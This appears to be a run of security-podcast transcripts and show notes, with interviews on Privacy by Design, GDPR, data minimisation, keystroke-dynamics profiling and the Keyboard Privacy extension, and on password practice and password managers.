Companies are extremely reluctant to talk about this commercial trade. So, they do occasionally say that, "Oh, this is great for science and for medicine, and all of these great things will happen." Well, if that is so fantastic, let's have this discussion where everyone will say, "All right. Here's how we use the data. Here's how we share it. Here's how we sell it."
Then let people in on it and decide whether they really want that system or not. But it's hard to have that intelligent policy discussion, what's best for the whole country, if industry has decided for itself how to proceed without involving others.
IOS: Well, I'm so glad you've written this book. This will, I'm hoping, will promote the discussion that you're talking about. Well, this has been great. I want to thank you for the interview. So, by the way, where can our listeners reach out to you on social media? Do you have a handle on Twitter? Or Facebook?
AT: Well, I'm @datacurtain and I have a webpage, which is http://adamtanner.news/
IOS: Wonderful. Thank you very much, Adam.
We continue our discussion with Dr. Ann Cavoukian. She is currently Executive Director of Ryerson University’s Privacy and Big Data Institute and is best known for her leadership in the development of Privacy by Design (PbD).
In this segment, Cavoukian tells us that once you’ve involved your customers in the decision making process, “You won’t believe the buy-in you will get under those conditions because then you’ve established trust and that you’re serious about their privacy.”
We also made time to cover General Data Protection Regulation (GDPR) as well as three things organizations can do to demonstrate that they are serious about privacy.
Learn more about Dr. Cavoukian:
Dr. Cavoukian: I think one of the things businesses don't do very well is involve their customers in the decisions that they make, and I'll give you an example. Years ago I read something called "Permission Based Marketing" by Seth Godin, and he's amazing. And I read it, and I thought, "Oh this guy must have a privacy background," because it was all about enlisting the support of your customers, gaining their permission and getting them to, as Godin said, "Put their hand up and say 'count me in.'" So I called him, he was based in California at the time, and I said, "Oh Mr. Godin, you must have a privacy background?" And he said something like, "No, lady, I'm a marketer through and through, but I can see the writing on the wall. We've gotta engage customers, get them involved, get them to wanna participate in the things we're doing."
So, I always tell businesses that are serious about privacy, "First of all, don't be quiet about it. Shout it from the rooftops, the lengths you're going to, to protect your customer's privacy. How much you respect it, how user-centric your programs are, and you're focused on their needs in delivering." And, then, once they understand this is the background you're bringing, and you have great respect for privacy, in that context you say, "We would like you to consider giving us permission to allow it for these additional secondary uses. Here's how we think it might benefit you, but we won't do it without your positive consent." You wouldn't believe the buy-in you will get under those conditions because then you have established a trusted business relationship. They can see that you're serious about privacy, and then they say, "Well by all means, if this will help me, in some way, use my information for this additional purpose." You've gotta engage the customers in an active dialog.
Cindy Ng: So ask, and you might receive.
Dr. Cavoukian: Definitely, and you will most likely receive.
Cindy Ng: In sales processes they're implementing that as well, "Is it okay if I continue to call you, or when can I call you next?" So they're constantly feeling they're engaged and part of the process, and it's so effective.
Dr. Cavoukian: And I love that. Myself, as a customer... I belong to this air miles program, and I love it, because they don't do anything without my positive consent. And, yet, I benefit because they send me targeted ads and things I'm interested in. And I'm happy to do that, and then I get more points and then it just continues to be a win-win.
Cindy Ng: Did you write anything about user access controls? What are your thoughts on that?
Dr. Cavoukian: We wrote about it in the context of that you've gotta have restricted access to those who have... I was gonna say, "Right to know." Meaning there are some business purpose for which they're accessing the data. And that can be...when I say, "business purpose," I mean that broadly, in a hospital. People who are taking care of a patient, in whatever context, it can be in the lab. They go there for testing. Then they go for an MRI, and then they go... So there could be a number of different arms that have legitimate access to the data, because they've gotta process it in a variety of different ways. That's all legitimate, but those people who aren't taking care of the patient, in some broad manner, should have absolutely complete restricted access to the data. Because that's when the snooping and the rogue employee...
Cindy Ng: Curiosity.
Dr. Cavoukian: ...picture, the curiosity, takes you away, and it completely distorts the entire process in terms of the legitimacy of those people who should have access to it, especially in a hospital context, or patient context. You wanna enable easy access for those who have a right to know because they're treating patients. And then the walls should go up for those who are not treating in any manner. It'd be difficult to do, but it is imminently doable, and you have to do it because that's what patients expect. Patients have no idea that someone might be just, out of curiosity, looking at their file. You've had a breast removed, you had... I mean horrible things happen.
Cindy Ng: Tell us about GDPR, and it's implications on Privacy by Design.
Dr. Cavoukian: For the first time, right now the EU has the General Data Protection Regulation, which passed for the first time, ever. It has the words, the actual words, "Privacy by Design" and "Privacy as the default" in the stature.
Cindy Ng: That's great.
Dr. Cavoukian: It's a first, it's really huge, but what that means, it will strengthen those laws far higher than the U.S. laws. We talked about privacy as the default. It's the model of positive consent. It's not just looking for the opt out box. It's gonna really raise the bar, and that might present some problems in dealing with laws in the states.
Cindy Ng: Then there's also their right to be forgotten, and we live in such a globalized world, people both doing business in the states and in Europe, it's been complicated.
Dr. Cavoukian: It does get very complicated. What I tell people everywhere that I go to speak is that if you follow the principles of Privacy by Design, which in itself raised the bar dramatically from most legislation, you will virtually be assured of complying with your regulations, whatever jurisdiction you're in. Because you're following the highest level of protection. So that's another attractive feature about Privacy by Design is it offers such a high level of protection that you're virtually assured of regulatory compliance, whatever jurisdiction you're in.
And in the U.S., I should say, that the FTC, the Federal Trade Commission, a number of years ago, under Jon Leibowitz, when he was Chair, they made Privacy by Design the first of three best practices that the FTC recommended. And since he's left, and Chairwoman Edith Ramirez is the Chair, she has also followed Privacy by Design and Security by Design, which are absolutely, interchangeably critical, and they are holding this high bar. So, I urge companies always to follow this to the extent that they can, because it will elevate their standing, both with the regulatory bodies, like the FTC, and with commissioners, and jurisdictions, and the EU, and Australia, and South America, South Africa. There's something called GPN, the Global Privacy Network, and a lot of the people who participate in these follow these discussions.
Cindy Ng: What are three things that organizations can do in terms of protecting their consumers' privacy?
Dr. Cavoukian: So, when I go to a company, I speak to the board of directors, their CEO, and their senior executive. And I give them this messaging about, "You've gotta be inclusive. You have to have a holistic approach to protecting privacy in your company, and it's gotta be top down." If you give the messaging to your frontline folks that you care deeply about your customer's privacy, you want them to take it seriously, that message will emanate. And, then what happens from there, the more specific messaging is, what you say to people, is you wanna make sure that customers understand their privacy is highly respected by this company. "We go to great lengths to protect your privacy." You wanna communicate that to them, and then you have to follow up on it. Meaning, "We use your information for the purpose intended that we tell you we're gonna use it for. We collect it for that purpose. We use it for that purpose." And then, "Privacy is the default setting. We won't use it for anything else without your positive consent after that, for secondary uses."
So that's the first thing I would do. Second thing I would do is I would have at least quarterly meetings with staff. You need to reinforce this message. It's gotta be spread across the entire organization. It can't just be the chief privacy officer who's communicating this to a few people. You gotta get everyone to buy into this, because you... I was gonna say the lowest. I don't mean low in terms of category, but the frontline clerk might be low on the totem pole, but they may have the greatest power to breach privacy. So they have to understand, just like the highest senior manager has to understand, how important privacy is and why and how you can protect it. So have these quarterly meetings with your staff. Drive the message home, and it can be as simple as them understanding that this is... You're gonna get what I call, "privacy payoff." By protecting your customer's privacy, it's gonna yield big returns for your company. It will increase customer confidence and enhance customer trust, and that will increase our bottom line.
And the third thing, I know this is gonna a little pompous, but I would invite, and only because this happened to me, I've been invited in to speak to a company, like, once a year. And you invite everybody, from top to bottom. You open it up and... People need to have these ideas reinforced. It has to be made real. "Is this really a problem?" So, you bring in a speaker. I'm using myself as an example because I've done it, but it can be anybody who can speak to what happens when you don't protect your customer's privacy. It really helps for people inside a company, especially those doing a good job, to understand what can happen when you don't do it right and what the consequences are to both the company and to employees. They're huge. You can lose your jobs. The company could go under. You could be facing class action lawsuits.
And I find that it's not all a bad news story. I give the bad news, what's happening out there and what can happen, and then I applaud the behavior of the companies. And what they get is this dual message of, "Oh my God, this is real. This has real consequences when we fail to protect customer's privacy, but look at the gains we have, look at the payoff in doing so." And it makes them feel really good about themselves and the job that they're doing, and it underscores the importance of protecting customer's privacy.
Next month, the world will be talking security at the annual RSA Conference, which will be held in San Francisco on February 13th to the 17th. When it comes to discussing security matters, experts often tell us to take stock of our risks or to complete a risk assessment. However, perhaps before understanding where we might be vulnerable, it might be more important to consider exactly what threats we’re really faced with.
In this episode of the Inside Out Security Show, I asked our panelists – Cindy Ng, Mike Thompson, Kilian Englert, and Mike Buckbee about four #realthreats – disgruntled employees, passwords on sticky notes, hijacked accounts and ransomware.
I recently had the chance to speak with former Ontario Information and Privacy Commissioner Dr. Ann Cavoukian about big data and privacy. Dr. Cavoukian is currently Executive Director of Ryerson University’s Privacy and Big Data Institute and is best known for her leadership in the development of Privacy by Design (PbD).
What’s more, she came up with PbD language that made its way into the GDPR, which will go into effect in 2018. First developed in the 1990s, PbD addresses the growing privacy concerns brought upon by big data and IoT devices.
Many worry about PbD’s interference with innovation and businesses, but that’s not the case.
When working with government agencies and organizations, Dr. Cavoukian’s singular approach is that big data and privacy can operate together seamlessly. At the core, her message is this: you can simultaneously collect data and protect customer privacy.
Cindy Ng
With Privacy by Design principles codified in the new General Data Protection Regulation, which will go into effect in 2018, it might help to understand the intent and origins of it. And that's why I called former Ontario Information and Privacy Commissioner, Dr. Ann Cavoukian. She is currently Executive Director of Ryerson University's Privacy and Big Data Institute and is best known for her leadership in the development of Privacy by Design. When working with government agencies and organizations, Dr. Cavoukian's singular approach is that big data and privacy can operate together seamlessly. At the core, her message is this, you can simultaneously collect data and protect customer privacy.
Thank you, Dr. Cavoukian for joining us today. I was wondering, as Information and Privacy Commissioner of Ontario, what did you see what was effective when convincing organizations and government agencies to treat people's private data carefully?
Dr. Cavoukian
The approach I took...I always think that the carrot is better than the stick, and I did have order-making power as Commissioner. So I had the authority to order government organizations, for example, who were in breach of the Privacy Act to do something, to change what they were doing and tell them what to do. But the problem...whenever you have to order someone to do something, they will do it because they are required to by law, but they're not gonna be happy about it, and it is unlikely to change their behavior after that particular change that you've ordered. So, I always led with the carrot in terms of meeting with them, trying to explain why it was in both their best interest, in citizens' best interest, in customers' best interest, when I'm talking to businesses. Why it's very, very important to make it...I always talk about positive sum, not zero sum, make it a win-win proposition. It's gotta be a win for both the organization who's doing the data collection and the data use and the customers or citizens that they're serving. It's gotta be a win for both parties, and when you can present it that way, it gives you a seat at the table every time. And let me explain what I mean by that. Many years ago I was asked to join the board of the European Biometrics Forum, and I was honored, of course, but I was surprised because in Europe they have more privacy commissioners than anywhere else in the world. Hundreds of them, they're brilliant. They're wonderful, and I said, "Why are you coming to me as opposed to one of your own?" And they said, "It's simple." They said, "You don't say 'no' to biometrics. You say 'yes' to biometrics, and 'Here are the privacy protective measures that I insist you put on them.'" They said, "We may not like how much you want us to do, but we can try to accommodate that. But what we can't accommodate is if someone says, 'We don't like your industry.'" You know, basically to say "no" to the entire industry is untenable. So, when you go in with an "and" instead of a "versus," it's not me versus your interests. It's my interests in privacy and your interests in the business or the government, whatever you're doing. So, zero sum paradigms are one interest versus another. You can only have security at the expense of privacy, for example. In my world, that doesn't cut it.
Cindy Ng
Dr. Cavoukian, can you tell us a little bit more about Privacy by Design?
Dr. Cavoukian
I really crystallized Privacy by Design really after 9/11, because at 9/11 it became crystal clear that everybody was talking about the vital need for public safety and security, of course. But it was always construed as at the expense of privacy, so if you have to give up your privacy, so be it. Public safety's more important. Well, of course public safety is extremely important, and we did a position piece at that point for our national newspaper, "The Globe and Mail," and the position I took was public safety is paramount with privacy embedded into the process. You have to have both. There's no point in just having public safety without privacy. Privacy forms the basis of our freedoms. You wanna live in free democratic society, you have to be able to have moments of reserve and reflection and intimacy and solitude. You have to be able to do that.
Cindy Ng
Data minimalization is important, but what do you think about companies that do collect everything with hopes that they might use it in the future?
Dr. Cavoukian
See, what they're asking for, they're asking for trouble, because I can bet you dollars to doughnuts that's gonna come back to bite you. Because, especially with data, that you're not clear about what you're gonna do with it, so you got data sitting there. What data does is in identifiable form is attracts hackers. It attracts rogue employees on the inside who will make inappropriate use of the data, sell the data, do something with the data. It just...you're asking for trouble, because keeping data in identifiable form, once the uses have been addressed, just begs trouble. I always tell people, if you wanna keep the data, keep the data, but de-identify it. Strip the personal identifiers, make sure you have the data aggregated, de-identified, encrypted, something that protects it from this kind of rogue activity. And you've been reading lately all about the hackers who are in, I think they were in the IRS for God's sakes, and they're getting in everywhere here in my country. They're getting into so many databases, and it's not only appalling in terms of the data loss, it's embarrassing for the government departments who are supposed to be protecting this data. And it fuels even additional distrust on the part of the public, so I would say to companies, "Do yourself a huge favor. You don't need the data, don't keep it in identifiable form. You can keep it in aggregate form. You can encrypt it. You can do lots of things. Do not keep it in identifiable form where it can be accessed in an unauthorized manner, especially if it's sensitive data." Oh my god, health data...Rogue employees, we have a rash of it here, where...and it's just curiosity, it's ridiculous. The damage is huge, and for patients, and I can tell you, I've been a patient in hospitals many times. The thought that anyone else is accessing my data...it's so personal and so sensitive. So when I speak this way to boards of directors and senior executives, they get it. They don't want the trouble, or I haven't even talked costs. Once these data breaches happen these days, it's not just lawsuits, they're class action lawsuits that are initiated. It's huge, and then the damage to your reputation, the damage to your brand, can be irreparable.
Cindy Ng
Right. Yeah, I remember Meg Whitman said something about how it takes years and years to build your brand and reputation and seconds ruined.
Dr. Cavoukian
Yeah, yes. That is so true. There's a great book called "The Reputation Economy" by Michael Fertik. He's the CEO of reputation.com. It's fabulous. You'd love it. It's all about exactly how long it takes to build your reputation, how dear it is and how you should cherish it and go to great lengths to protect it.
Cindy Ng
Can you speak about data ownership?
Dr. Cavoukian
You may have custody and control over a lot of data, your customer's data, but you don't own that data. And with that custody and control comes an enormous duty of care. You gotta protect that data, restrict your use of the data to what you've identified to the customer, and then if you wanna use it for additional purposes, then you've gotta go back to the customer and get their consent for secondary uses of the data. Now, that rarely happens, I know that. In Privacy by Design, one of the principles talks about privacy as the default setting. The reason you want privacy to be the default setting...what that means is if a company has privacy as the default setting, it means that they can say to their customers, "We can give you privacy assurance from the get-go. We're collecting your information for this purpose," so they identify the purpose of the data collection. "We're only gonna use it for that purpose, and unless you give us specific consent to use it for additional purposes, the default is we won't be able to use it for anything else." It's a model of positive consent, it gives privacy assurance, and it gives enormous, enormous trust and consumer confidence in terms of companies that do this. I would say to companies, "Do this, because it'll give you a competitive advantage over the other guys."
As you know, because you sent it to me, the Pew Research Center, their latest study on Americans' attitudes, you can see how high the numbers are, in the 90 percents. People have had it. They want control. This is not a single study. There have been multiple surveys that have come out in the last few months like this. Ninety percent of the public, they don't trust the government or businesses or anyone. They feel they don't have control. They want privacy. They don't have it, so you have, ever since, actually, Edward Snowden, you have the highest level of distrust on the part of the public and the lowest levels of consumer confidence. So, how do we change that? So, when I talk to businesses, I say, "You change that by telling your customers you are giving them privacy. They don't even have to ask for it. You are embedding it as the default setting which means it comes part and parcel of the system." They're getting it. I do what I call my neighbors test. I explain these terms to my neighbors who are very bright people, but they're not in the privacy field. So, when I was explaining this to my neighbor across the street, Pat, she said, "You mean, if privacy's the default, I get privacy for free? I don't have to figure out how to ask for it?" And I said, "Yes." She said, "That's what I want. Sign me up!"
See, people want to be given privacy assurance without having to go to the lengths they have to go to now to find the privacy policy, search through the terms of service, find the checkout box. I mean, it's so full of legalese. It's impossible for people to do this. They wanna be given privacy assurance as the default. That's your biggest bet if you're a private-sector company. You will gain such a competitive advantage. You will build the trust of your customers, and you will have enormous loyalty, and you will attract new opportunity.
Cindy Ng
What are your Privacy by Design recommendations for wearables and IoT innovators and developers?
Dr. Cavoukian
The internet of things, wearable devices and new app developers and start up...they are clueless about privacy, and I'm not trying to be disrespectful. They're working hard, say an app developer, they're working hard to build their app. They're focused on the app. That's all they're thinking about, how to deliver what the app's supposed to deliver on. And then you say, "What about privacy?" And they say, "Oh, don't worry about it. We've got it taken care of. You know, the third-party security vendor's gonna do it. We got that covered." They don't have it covered, and what they don't realize is they don't know they don't have it covered. "Give it to the security guys and they're gonna take care of it," and that's the problem. When I speak to app developers...I was at Tim O'Reilly's Web 2.0 last year or the year before, and there's 800 people in the room, I was talking about Privacy by Design, and I said, "Look, do yourself a favor. Build in privacy. Right now you're just starting your app developing, build it in right now at the front end, and then you're gonna be golden. This is the time to do it, and it's easy if you do it up front." I had dozens of people come up to me afterwards because they didn't even know they were supposed to. It had never appeared on their radar. It's not resistance to it. They hadn't thought of it. So our biggest job is educating, especially the young people, the app developers, the brilliant minds. My experience, it's not that they resist the messaging, they haven't been exposed to the messaging. Oh, I should just tell you, we started Privacy by Design certification. We've partnered with Deloitte and I’ll send you the link and we're, Ryerson University, where I am housed, we are offering this certification for Privacy by Design. But my assessment arm, my audit arm, my partner, is Deloitte, and we're partnering together, and we've had a real, real, just a deluge of interest.
Cindy Ng
So, do you think that's also why people are also hiring Chief Privacy Officers?
Dr. Cavoukian
Yes.
Cindy Ng
What are some qualities that are required in a Chief Privacy Officer? Is it just a law background?
Dr. Cavoukian
No, in fact, I'm gonna say the opposite, and this is gonna sound like heresy to most people. I love lawyers. Some of my best friends are lawyers. Don't just restrict your hiring of Chief Privacy Officers to lawyers. The problem with hiring a lawyer is they're understandably going to bring a legal regulatory compliance approach to it, which, of course, you want that covered. I'm not saying...You have to be in compliance with whatever legislation is in your jurisdiction. But if that's all you do, it's not enough. I want you to go farther. When I ask you to do Privacy by Design, it's all about raising the bar. Doing technical measures such as embedding privacy into the design that you're offering into the data architecture, embedding privacy as a default setting. That's not a legalistic term. It's a policy term. It's computer science. It's a... You need a much broader skill set than law alone. So, for example, I'm not a lawyer, and I managed to be Commissioner for three terms. And I certainly valued my legal department, but I didn't rely on it exclusively. I always went farther, and if you're a lawyer, the tendency is just to stick to the law. I want you to do more than that. You have to have an understanding of computer science, technology, encryption, how can you... De-identification protocols are critical, combined with the risk of re-identification framework. When you look at the big data world, the internet of things, they're going to do amazing things with data. Let's make sure it's strongly de-identified and resist re-identification attacks.
Cindy Ng
There have been reports that people can re-identify people without data.
Dr. Cavoukian
That's right, but if you examine those reports carefully, Cindy, a lot of them are based on studies where the initial de-identification was very weak. They didn't use strong de-identification protocols. So, like anything, if you start with bad encryption, you're gonna have easy decryption. So, it's all about doing it properly at the outset using proper standards. There's now four standards of de-identification that have all come out that are risk-based, and they're excellent.
Cindy Ng
Are you a fan of possibly replacing privacy policies with something simpler, like a nutrition label?
Dr. Cavoukian
It's a very clever idea. They have tried to do that in the past. It's hard to do, and I think your simplest one for doing the nutrition kinda label would be if you did embed privacy as the default setting. Because then you could have a nutrition label that said, "Privacy built in." You know how, I think, Intel had something years ago where you had security built it or something. You could say, "Privacy embedded in the system."
Over the past few weeks, we started seeing a few new security trends that we think haven’t yet had their defining moment and will likely see more of next year. We reflected on the predictions we made last year and shared our annual cybersecurity predictions for 2017.
Meanwhile the Inside Out Security Show panel – Kilian Englert, Forrest Temple and Mike Buckbee - also speculated on a few things of their own based on a few articles they’ve read the news recently – hackers guessing your credit card information in less than six seconds, the security implications of the Amazon Go Grocery Store, and more malvertising. Plus, we also continued our never ending debate on privacy.
But what the panelists couldn’t get enough of were the allegations that Russia attempted to affect the outcome of the US presidential election. No, we didn’t discuss the politics of what happened, but they did share teachable moments we can all learn from.
To start – we’ve all heard of scams where the IRS or FBI call about identify theft or about our taxes. But what happens when the real FBI is really calling? If there isn’t a process in place for every little detail that happens, then we’re left vulnerable.
“My first step would be to see if it’s really the FBI calling. Because there are so many weird scams around stuff like that,” advises Mike Buckbee.
Kilian Englert supplemented Mike’s advice with this suggestion: “If you look at some of the standards that come out, like the NIST standards. A lot of them recommend having some type of plan in place…some plan, any plan.”
And don’t be deterred because Forrest Temple reminds us, “You don’t see the successes; you only see the failures…That’s how data security is. Maybe there are a million successful for every failure, you just don’t know.”
Click play to hear the rest of the show and why Kilian isn’t a fan of Barcelona Football. There’s a point! We promise!
I recently came across a tweet that was shared during the Infosecurity Maganzine Conference in Boston, “Security is a benefit, but not always a feature.” Why? You can spend a lot of money and still be hacked or not spend a dime and not be hacked.
How did the Inside Out Security Show panel react? Here's what Mike Buckbee, Kilian Englert and Alan Cizenski had to say:
Buckbee: It’s all tradeoffs. It’s all a bet. If you go into a casino and putting money down…While it’s true you can spend a lot of money and still get hacked, it’s less likely than you spend nothing. Or not even so much spend, in terms of money, but in terms of effort. You spend the effort and time to make secure systems….so you’re trying to play the odds.
Englert: We can write it up as a true-ism…We’ve never been hacked before, so we must be secure. That’s the default security mindset, which is at odds with the truth…The best security in the world, only takes you so far.
Cizenski: When you’re spending money on security tools, at that point, at the very least, you’re gonna have an audit trail or something to look back at so you can say, “How did that happen?” Instead of just thinking, “We’ve never been hacked. We’re good.”…When it does happen, you can’t really do much about it [if you don’t have an audit trail].
Click play to learn more!
Additional comments include:
• A rogue admin who took down a former employer’s network
• Admins who experience burn out
• NIST announced guidance on SMS on two factor.
• Whether or not security problems are the user’s fault or not
• As well as the latest research report on security shortcomings on a heart device.
Based in Norway, Per Thorsheim is an independent security adviser for governments as well as organizations worldwide. He is also the founder of PasswordsCon.org, an annual conference that’s all about passwords, PIN codes, and authentication. Launched in 2010, the conference invites security professionals & academic researchers to better understand and improve security.
In part one of our discussion with Per, we examined two well-known forms of authentication – passwords and hardware. In this segment, he talks about a lesser known form -biometrics and the use of keystroke dynamics to identify individuals.
Per explains, “Keystroke dynamics, researchers have been looking at this for many, many years. It’s still an evolving piece of science. But it’s being used in real life scenarios with banks. I know at least there’s one online training company in the US that’s already using keystroke dynamics to verify if the correct person is doing the online exam. What they do is measure how you type on a keyboard. And they measure the time between every single keystroke, when you are writing in password or a given sentence. And they also look for how long you keep a button pressed and a few other parameters.”
What’s even more surprising is that it is possible to identify one’s gender using keystroke dynamics. Per says, “With 7, 8, 9 keystrokes, they would have a certainty in the area of 70% or more…and the more you type, if you go up to 10, 11, 12, 15 characters, they would have even more data to figure out if you were male or female.”
Those who don’t want to be profiled by their typing gait can try Per Thorshim’s and another infosec expert Paul Moore’s Keyboard Privacy extension.
Per Thorsheim: Keystrokes dynamics... There have been researchers looking into this for many, many years already. But still, it's a really a modeling piece of science. But it is also being used today in real-life scenarios with banks. I know that there is at least one online training company in the U.S. who is already using keystroke dynamics, to verify if the correct person is actually doing the online exam as an example. What they do is they measure how you type on your keyboard and they measure the time between every single keystroke when you're writing in a password or a given sentence. They also look out for how long you keep each button depressed and a few other parameters.
Now, this sounds weird, I know. But I learned from researchers in France, they have been collecting this kind of data from a lot of men and women, and talk about men and women being different in many different areas. But I had never guessed. I would have never believed until they told me that men and women in general type differently on a keyboard, using normal standard 10 finger touch type on a keyboard. They said that as soon as you have entered seven, eight, nine characters onto a keyboard, we can with a pretty good probability tell you if it is a man or a woman typing on the keyboard. That is again assuming typing normally with 10 fingers touch type on a keyboard.
Cindy Ng: What is the accuracy rate of the gender identification?
Per Thorsheim: The accuracy that they talked about is they would say that with seven, eight, nine keystrokes, they would have a certainty on this in the area of 70% or more. So, of course, it's not that good, but it's improving. And the more you type if you go up to 10, 12, 15 characters, they would have even more data to figure out whether you're a male or female. But that's just figuring out male or female. It doesn't identify you as a unique human being on planet earth. Because in that setting, this technology is nowhere near good enough. There are lots of people that would actually type just like you on a keyboard, in the world.
Cindy Ng: What's the probability of you typing in the same way as other people in our population?
Per Thorsheim: If you have an iPhone and you're using Touch ID with your iPhone or maybe an iPad today, the fingerprint reader that is being used by Apple today, they usually say that those devices have what we call a false acceptance rate or false rejection rate of 1 in 50,000. Meaning that 1 in 50,000 attempts, where you try to identify to your own phone will fail even if you're using the correct finger. The other way around 1 in 50,000 people, it means that person among 50,001 will have a fingerprint that will be accepted as you. But it's not you getting in.
So false acceptance rate, 1 to 50,000. With the keystroke dynamics, the last time I heard was 1 in 100. So they're saying that if you're in a room with 200 people, there will be 1, maybe even 2 people in there that would be able to type on the keyboard almost the same way as you do. Then they would be able to be identified as being Cindy, but it's not. It's them typing on a keyboard.
Cindy Ng: What's the potential abuse when we're using keystroke dynamics?
Per Thorsheim: The frustration is from the privacy perspective of this. A very simple example that I have been using, which is maybe chauvinistic as well as being male is, say that you go to an online store and you want to purchase a vacuum cleaner and you have never been there before. You don't have an account, nothing. In the search field, you type in vacuum cleaner. Based on that and nothing else, you have already given them so many keystrokes that they can identify whether you are male or female.
So if you are male or when they assume you are male based on how you type, they will give you the 3000 watts, black, shiny, Porsche model vacuum cleaner which is big and makes a lot of noise and it can run by itself. If they identify you as being female, maybe they think that you prefer the low noise, nice colored, red colored vacuum cleaner that doesn't take up a lot of space when it's not being used. That's a very simple example.
But from a privacy perspective, this can be used for tracking you across multiple route source. They can identify you as a returning customer. They can also use it to check if you are, say, allowing your kids or your husband or your girlfriend to log in to your accounts. They can be able to use that for fraud detection to say that this is the wrong person logging in. That can be a good feature to have. It can also be abused in ways that will affect your privacy or your right to privacy.
Cindy Ng: All the different types of authentication: passwords, hardware, biometrics. It all culminates to behavioral profiling, which is a hallmark worry for many. You and another security expert, Paul Moore, created Keyboard Privacy. It's supposed to disrupt your keystroke tracking gait from 82% to 3%. I read this in an article. Can you tell us a little bit more about Keyboard Privacy?
Per Thorsheim: We learned about this keystroke dynamics being used with several banks here in Norway, where I live. We learned about this because we received information from people who told us that, "Did you actually know the banks are using keystroke dynamics?" We said, "No." We didn't know that. But we figured out that it is being used. We looked at the source code of web pages where we log in and we saw that they're actually using keystroke dynamics. They are using keystroke dynamics as a sort of fraud prevention. They want to make sure that the correct person is logging into their own account and not somebody else. That's a good purpose.
What we reacted to was the fact that they didn't tell us, that they had suddenly started to build these biometric profiles, the keystroke dynamics profile of every single user that are using online banking here in Norway. Also, a couple of banks in the UK as well are doing this. So we had an evening, me and Paul, and we were talking to each other and like privacy counsels, blah blah blah, security usability, blah blah blah. But they just wanna say, just for the fun of it. How can we break this? How can we prevent them from being able to recognize if it is me or Paul or anybody else logging into my accounts?
Say, we would like to do that, prevent app tracking to be able to identify us as being male or female. So we looked at the code and we realized, well, they are looking at a very low number of parameters, two, three, four, different parameters. One of them being the amount of time between each key press and another parameter is being, how long will you keep each key depressed on your keyboard? The plug-in that Paul created based on my idea was that the plug-in for Google Chrome will take all your keystrokes from your keyboard. And before they enter any form on that page you're visiting, we will put in a random time delay between each keystroke, and that random time delay will be anything from zero milliseconds to 50 milliseconds.
To the human eye, even if you type really fast, that delay is so small that you won't be able to notice on screen. But for anyone using keystroke dynamics, this will completely destroy their capability of building a profile on how you type, and it will also destroy their ability to detect whether it is you or anyone else logging into a specific account.
Cindy Ng: There is warning before you install it. It says it can read and change all your data on websites you visit. I was wondering if you can expand on that warning. Do you store the data that you're changing?
Per Thorsheim: For those who are interested in programming and can read a code, you can read a code for this plug-in and it's pretty simple and short code. The only thing we do is to insert this random time delay between different websites. We also have an option to turn it off for specific websites. If you use that option, of course, that information will be stored locally on your computer. Say that for bank X or website Y, we have stored information on your computer saying that the plug-in shouldn't be used for this website. You want to be yourself, so to speak.
The thing is that with these plug-ins is that since the plug-in is receiving whatever you type on your keyboard and does something to that data before putting it into a website, it wouldn't be fully possible for us, just like anybody else developing plug-ins, to record everything you type on your keyboard ,and as an example, send it off to us or to your favorite three-letter agency country in the world.
Cindy Ng: With your password conference, that's really interesting. It's the one and only conference on passwords. Tell us a little bit more about that.
Per Thorsheim: I'm the founder of and running PasswordsCon, which is the world's first and as far as I know only conference in the world which is only about passwords and digital authentication. It's a conference that I started in 2010, by support from the University of Bergen in Norway where I live. So it's two and a half days with geeky people from all over the world, academics and security professionals and password hackers if you like, that are discussing how to break passwords, how to secure them, how to transmit them, how to store them, how not to store them of course, all kinds of science and real world experience into handling passwords from every imaginable perspective.
I can tell you this, I know. You don't have to say this. I know that it sounds very nerdy and a lot of people do ask me like, why this insane interest in passwords. But I can also tell you that I think that almost everyone that has ever participated for the first time at this conference, when I ask them afterward, so the obvious question, "What did you think of the conference?" I think that almost everyone has responded by saying that, "Wow! I had never thought that such a topic like passwords, which I consider to be such an insignificant and very small part of my everyday life and security, can actually be expounded into so many topics like statistics, cryptography, linguistics, math, psychology, colors, adherence, sounds, and everything."
So people have been really, really fascinated when they have participated in this conference. Also, lots of people have gained new ideas from research and also for taking back to their your own organizations to implement.
Cindy Ng: I think what people are saying now is that security and technology, it's becoming so seamless. That it's kind of almost like a utility, where you just plug and play which has its own problems with Mirai botnet attack.
Per Thorsheim: Yeah.
Cindy Ng: With the default password problems. So I would equate passwords with electricity and as a huge important utility for people to understand, to synthesize, to work together, to figure it out. We often tend to innovate and create as fast as possible without security and privacy from the start. So it's a great thing for everyone. So I applaud you for doing that.
Per Thorsheim: Yeah. Thank you. I am concerned about the internet of things as we say and the Mirai botnet really showed us. It really gave us not one, several lessons on security or insecurity of internet of things and all kinds of connected devices. It's interesting to see that the major attack vector who was that there were security cameras, DVRs, all kinds of equipment that was collected to the internet and they were running with default usernames and passwords and they were available online. So just by doing an internet-wide scan, you will find hundreds of thousands of such devices are collected and you can easily break into and use them for illegal purposes. Which we saw with the Mirai botnet.
Cindy Ng: Often times people set the password as default, thinking that the user will go back and change it. But that's not the case. It's also a good segue to hear from a password expert, a security adviser. What are your password secrets, that you can...?
Per Thorsheim: I will draw a line between whether you are tech savvy and using computers. Or if you're like my own mother, who doesn't take an interest at all. I have to draw a line there. First of all, if you're like my own mother and you're not really interested in learning how to use computers and most technology, you're just one of those that you just want it to work. The best advice I can give you is to write down your passwords on a piece of paper or in a small notebook and keep it in your kitchen drawer or somewhere at home, where it is reasonably safe. In that, you will put down the passwords or the pass phrases that you use for different sites and services on the internet.
Most of those passwords, you don't have to remember them. You don't need to use them every day. An important part is that... And I'm sorry to say this. But you have to try to use unique passwords for different services that you're using online. Because we know that bad guys, as soon as they're able to get access to your password and you're using them from one site to one service, they will try very quickly to use the same username and password across other services to gain access to more accounts, more money, more information, more data that they can use and abuse about you, sell to spammers and the like online. So write down and use unique passwords. That's advice for my mother.
If you're a tech savvy, if you have used and using computers, I highly recommend using a piece of software called a Password Manager. There are many out there, some of them are not as good either from security or usability perspectives. But there are some that are really good for both. Some of them are even free and I highly recommend using them. They will generate passwords for you. They will remember them for you. They will automatically input them into the username and password fields and help you log in. And the only password you really have to remember is the master password for your password manager. That's the one password you can never forget.
Cindy Ng: What if your password manager has a breach? Do you have another layer of security just in case that happens?
Per Thorsheim: There are different password managers of that. Some of them will store your data in a cloud service like LastPass. While other password managers like 1Password will only store your data locally. So the only way it can be breached would be if somebody got access to your physical computer or phone. If that happens, you have a more serious problem than just a password manager and there could be accounts stored in there.
